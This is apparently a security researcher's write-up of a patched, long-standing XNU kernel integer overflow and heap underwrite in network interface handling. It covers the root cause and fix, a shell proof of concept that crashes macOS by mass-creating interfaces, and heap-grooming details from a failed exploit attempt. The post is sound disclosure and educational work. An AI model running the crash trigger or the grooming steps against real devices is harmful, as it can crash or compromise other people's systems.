Adam Doupé
This post describes the second vulnerability that I found in the XNU kernel, (first of which is here). XNU is the Operating System used for a number of Apple products, including Macs, iPhones, iPads, Apple Watches, Apple TVs, and so on.
The vulnerability is a 19-year-old heap underwrite vulnerability in XNU’s dlil.c
(which handles network interfaces) caused by an (uint16_t
) integer overflow in if.c
. This can be triggered by a root user creating 65536 total network interfaces.
Root Cause
When an interface is created in ifnet_attach
:dlil.c
, if_next_index
:if.c
is called to create a if_index
on the ifnet_t ifp
:
int idx = if_next_index();
if (idx == -1) {
ifp->if_index = 0;
ifnet_lock_done(ifp);
ifnet_head_done();
dlil_if_unlock();
return ENOBUFS;
}
ifp->if_index = (uint16_t)idx; // Vulnerability
This index is cast to a uint16_t
.
if_next_index
creates one chunk of memory that it splits into two: ifnet_addrs
and ifindex2ifnet
, and the comments for if_next_index
hint at the problem:
“ifnet_addrs[] is indexed by (if_index - 1), whereas ifindex2ifnet[] is indexed by ifp->if_index.”
This means that when 65536 network interfaces are created, the last interface has a ifp->if_index
of 0, and then ifnet_attach
will write the allocated struct ifaddr *
ifa
out of the bounds of ifnet_addrs
:
VERIFY(ifnet_addrs[ifp->if_index - 1] == NULL);
ifnet_addrs[ifp->if_index - 1] = ifa;
My Proposed Fix
One fix for the vulnerability would be to limit the amount of interfaces that can be created to 0xFFFF. This could be done in if_next_index
, and would not impact an interface with the same name (e.g. feth0
) that is created and destroy repeatably (the only likely scenario for this would be a utun
device, which is created when a root or privileged process creates a PF_SYSTEM
SYSPROTO_CONTROL
socket
).
The Real Fix
The real fix here is in if_next_index
:
/*
* Although we are returning an integer,
* ifnet's if_index is a uint16_t which means
* that's our upper bound.
*/
if (if_index >= UINT16_MAX) {
return -1;
}
It seems that we agree on the correct fix (although it’s strange to keep the return value as an int
if what you’re returning cannot ever be that large).
Affected Versions
Verified on MacOS 13.0 M1 Mac mini running build 22A380.
Also tested on iOS.
From what I can tell, it seems the vulnerable code was introduced in XNU 517.3.7, Mac OSX 10.3.2, released on December 17th, 2003, making it a 19-year-old bug!
Exploitation Conditions
Creating (and destroying) a network interface normally requires root permissions.
POC
This was a super interesting POC to create.
The simplest POC for this fits in a tweet (NOTE: this might crash your machine):
C=$(sysctl -A | grep ifcount | cut -d':' -f2 | xargs)
for i in `seq 32767`
do
sudo ifconfig "feth$i" create
sudo ifconfig "feth$i" destroy
done
T=$((65536 - $C - 32767))
for i in `seq $T`
do
sudo ifconfig "vlan$i" create
sudo ifconfig "vlan$i" destroy
done
Learning about the destroy
after the create
was hard-fought knowledge—for the first ~month of trying to POC this bug I only used create
. This triggers some exponential slowdown in the kernel, and so creating enough interfaces took several hours (in my VM it would take >12 hours to trigger). Finally I realized that you could destroy the interface and this would fix the slowdown (I also had learn that the interface info was reused/cached, even if it was deleted, so you couldn’t just create and destroy the same interface type over and over).
However, it’s much faster to trigger the bug in C (by calling the correct ioctl
to create and destroy the interfaces.
Here’s the POC that I wrote to trigger this bug, which creates enough interfaces to trigger the integer overflow and the heap underwrite.
If you’re on MacOS 12.6 (last OS that I tested this on), then ~50% of the time your system will crash. This is because there is no memory mapped before ifnet_addrs
, and so the write goes to an unmapped page.
Potential Physical Attack
I think it might be possible to trigger this bug through the lightning cable on an iPhone or perhaps USB-C cable on a MacOS machine.
However, Apple (in a great move) now requires you to unlock your device and approve the connection from USB. So, this wouldn’t be possible to do on a locked, pre-first-boot device, however it might be possible to create a malicious device that tricks the user into plugging in and allowing.
I did not pursue this approach (I really don’t have hardware experience), however the idea would be to create a USB device that pretends to be ~65536 NICs. One downside of this approach it that it takes on the order of hours to create all these interfaces (which is why the POC destroys the interface after it’s created).
I did test that this idea could work by using an old iPhone 6s running iOS 12.1, with the checkra1n beta 0.12.4 jailbreak.
On first boot, I plugged in a lightning to ethernet adapter, and it actually created three new interfaces: en3
(the ethernet device), EHC1
, and OHC2
(no idea what those are).
So this might be possible, and I would love to know if anyone’s able to do this.
My Failed Exploit Attempt
While creating a POC in MacOS 12.5 I tried a ton to create a POC that could alter the struct ifaddr * ifa
that was underwritten, by controlling something that was allocated before ifnet_addrs
and then modifying that pointer.
The spoiler alert here is that I failed: I was very close (as I’ll try to layout here) but was stuck on how to flip bits in the pointer without crashing or triggering an infinite loop. Then, MacOS 12.6 dropped which changed the behavior of the kernel’s memory allocator so the POC crashed 50% of the time. I decided I spent enough of my life on this bug (about two months of dedicated effort) so I sent the basic POC to Apple and here we are.
I hope that maybe you can learn something from my failed approach.
Anyway, it seems like this should be easy, use the standard trick of spraying a bunch of Out-Of-Line Mach Messages, then trigger the underwrite, read the messages to see which one was overwritten, then use that to change/alter the pointer.
O, dear reader, it was not so easy.
The first thing to understand is that ifnet_addrs
is if_next_index
creates it from two chunks of memory, and this memory is doubled every time the limit is hit:
if (ifnet_addrs == NULL) {
new_if_indexlim = INITIAL_IF_INDEXLIM;
} else {
new_if_indexlim = if_indexlim << 1;
}
/* allocate space for the larger arrays */
n = (2 * new_if_indexlim + 1);
new_ifnet_addrs = (caddr_t)kalloc_type(caddr_t, n, Z_WAITOK | Z_ZERO);
This means that n
gets larger and larger, so we need to allocated 0x8000
interfaces first, and the next one will trigger the allocation of the final location of ifnet_addrs
.
For allocations larger than KHEAP_MAX_SIZE
, kalloc_type
will call into kalloc_large
.
#if !defined(__LP64__)
#define KHEAP_MAX_SIZE 8 * 1024
#elif __x86_64__
#define KHEAP_MAX_SIZE 16 * 1024
#else
#define KHEAP_MAX_SIZE 32 * 1024
#endif
So, we should be able to allocate any object into kalloc_large
if it’s over say 0x8000
in size (this way it’s applicable in all the platforms).
Oh if only things were that easy/simple.
Turns out that kalloc_large
works by calling into kernel_memory_allocate
to allocate a page of memory directly from the VM system. Which means that this is essentially above the kernel heap allocation layer.
kernel_memory_allocate
eventually calls vm_map_find_space
, which then calls vm_map_locate_space
.
vm_map_get_range
then gets the range from a global variable called kmem_ranges
based on flags that are passed all the way:
kmem_range_id_t range_id = vmk_flags->vmkf_range_id;
effective_range = kmem_ranges[range_id];
However, there’s also a check later in vm_map_get_range
to see if the size is greater than KMEM_SMALLMAP_THRESHOLD
(which is 1MB on 64-bit platforms):
if (size >= KMEM_SMALLMAP_THRESHOLD) {
effective_range = kmem_large_ranges[range_id];
}
These ranges are quite different, as shown from an lldb debug session that I had:
(lldb) print kmem_large_ranges
(kmem_range [4]) $4 = {
[KMEM_RANGE_ID_NONE] = (min_address = 0x0000000000000000, max_address = 0x0000000000000000)
[KMEM_RANGE_ID_PTR_0] = (min_address = 0xfffffff35b14b000, max_address = 0xfffffffee9aa1000)
[KMEM_RANGE_ID_PTR_1] = (min_address = 0xffffffe625d7b000, max_address = 0xfffffff1b46d1000)
[KMEM_RANGE_ID_DATA] = (min_address = 0xffffffa7100a6000, max_address = 0xffffffd54a5fe000)
}
(lldb) print kmem_ranges
(kmem_range [4]) $1 = {
[KMEM_RANGE_ID_NONE] = (min_address = 0x0000000000000000, max_address = 0x0000000000000000)
[KMEM_RANGE_ID_PTR_0] = (min_address = 0xfffffff287c0e000, max_address = 0xffffffffbcfde000)
[KMEM_RANGE_ID_PTR_1] = (min_address = 0xffffffe55283e000, max_address = 0xfffffff287c0e000)
[KMEM_RANGE_ID_DATA] = (min_address = 0xffffffa0756be000, max_address = 0xffffffd54a5fe000)
}
So, this explains why we couldn’t use OOL Mach messages (I tried them twice I think): due to some limit that I can’t find right now we can’t allocate an OOL Mach Message that’s > 1MB.
To make matters worse, we need our victim allocation to end up in KMEM_RANGE_ID_PTR_0
in kmem_large_ranges
(which, empirically, is where ifnet_addrs
ended up).
(I learned a lot about the importance of keeping notes while trying exploitation. I didn’t keep track of all of these limits, so I wasted lots of time trying different exploitation methods while eventually rediscovering them.)
I then did what any good hacker does: look at every single allocation site in the kernel (using IDA this time on a debug kernel) to see ones that were unbounded.
But now we need to define what our goal here is: We want this victim object allocation to be before the vulnerable object so that we can underwrite the vulnerable object and change the last 8 bytes of that object.
So, it needs:
- An allocation that we can control/trigger from userspace.
- An allocation that persists (no thank you race conditions, not today).
- An allocation that is greater than 1MB (the fun
KMEM_SMALLMAP_THRESHOLD
). - An allocation that falls into
KMEM_RANGE_ID_PTR_0
. - An allocation where the object size (i.e. the space that we can use) is a multiple of the page size: We need to be able to read or write to the last 8 bytes of the allocation.
Note that I didn’t start with this list, but only ended up here after following multiple dead ends and false starts.
Finally, I find something promising in kern_descrip.c
’s fdalloc
:
newofiles = kheap_alloc(KM_OFILETABL, numfiles * OFILESIZE,
Z_WAITOK);
The SUPER weird thing here is that OFILESIZE
is NINE (9) BYTES! Why why why, such a weird allocation pattern!
And it starts out at a strange initial that’s difficult to tell, so I created this table (note that it’s allocation size not number of objects) to see when it would be page divisible (I like to do this in an org-mode table where I keep my notes):
| Actual Allocation | Actual Allocation | page(0x1000) divisible |
|-------------------+-------------------+------------------------|
| 0x1518 | 5400 | 1.3183594 |
| 0x2a30 | 10800 | 2.6367188 |
| 0x5460 | 21600 | 5.2734375 |
| 0xa8c0 | 43200 | 10.546875 |
| 0x15180 | 86400 | 21.09375 |
| 0x2A300 | 172800 | 42.1875 |
| 0x54600 | 345600 | 84.375 |
| 0xA8C00 | 691200 | 168.75 |
| 0x151800 | 1382400 | 337.5 |
| 0x2A3000 | 2764800 | 675 |
| 0x546000 | 5529600 | 1350 |
| 0xA8C000 | 11059200 | 2700 |
So we need there to be 0x2A3000 / 9 = 0x4B000 numfiles
here. But what are those numfiles
you ask?
Turns out that we’re looking at the kernel’s storage of a process' fd
s!
Oh no, can we create 0x4B000 fd
s in a process?
Yes, if we are root, there are two limits that control this and we can just bump them right up:
sudo ulimit -n unlimited
sudo sysctl -w kern.maxfilesperproc=614400
The cool thing is that we can actually use dup2
to specify a (large) wanted fd
(second argument to dup2
) and the kernel will allocate all this memory for us!
Through trial, error, and debugging (dtrace ftw) I found an allocation pattern of fd
s that put things where we want:
- Allocate three smaller fd tables first (to fill up first rather than after) using an fd of 153599.
- Allocate in a proc 0x2A3000 / 9 = 0x4B000 fds using dup2. This will be the victim proc table using an fd of 307199.
- Allocate one smaller fd tables in other procs of 0x151800 / 9 = 0x25800. These are only needed as spacing to take up room (and as much as needed) so that the target allocation will go after the victim. This is needed because of the “realloc” behavior that goes on when we allocate the victim.
- Trigger underwrite.
At this point, we can allocate a victim object in the correct region, we can allocate the vulnerable object after, then we can underwrite to write into it.
Success?
Oh no, now what do we control in this newofiles
array?
Later on in fdalloc
we find:
newofileflags = (char *) &newofiles[numfiles];
// ...
(void) memcpy(newofiles, fdp->fd_ofiles,
oldnfiles * sizeof(*fdp->fd_ofiles));
// ...
(void) memcpy(newofileflags, fdp->fd_ofileflags,
oldnfiles * sizeof(*fdp->fd_ofileflags));
So now we can see why the allocation size here is 9 bytes: 8 bytes for a pointer (what fdp->fd_ofiles
consists of) and 1 bytes for fdp->fd_ofileflags
which is the (single byte) flag for the file.
And, to make matters worse, the flags go at the end of newofiles
, which is where the underwrite happens (my kingdom for a pointer overlap).
Here are the flags that matter:
#define UF_RESERVED 0x04 /* open pending / in progress */
#define UF_CLOSING 0x08 /* close in progress */
#define UF_RESVWAIT 0x10 /* close in progress */
#define UF_INHERIT 0x20 /* "inherit-on-exec" */
I spent a ton of time trying to find a way to flip bits in the pointer using these flags.
Ultimately I gave up, sent what I had to Apple, and moved on to the next bug (but I did learn a lot in the process).
Then, I saw this awesome blog post by Jack Dates from Ret2 Systems talking about how to corrupt from kalloc_large
and kernel_map
.
Hope this was enlightening or maybe you can empathize in my plight (it seems that us hackers rarely talk about our failures).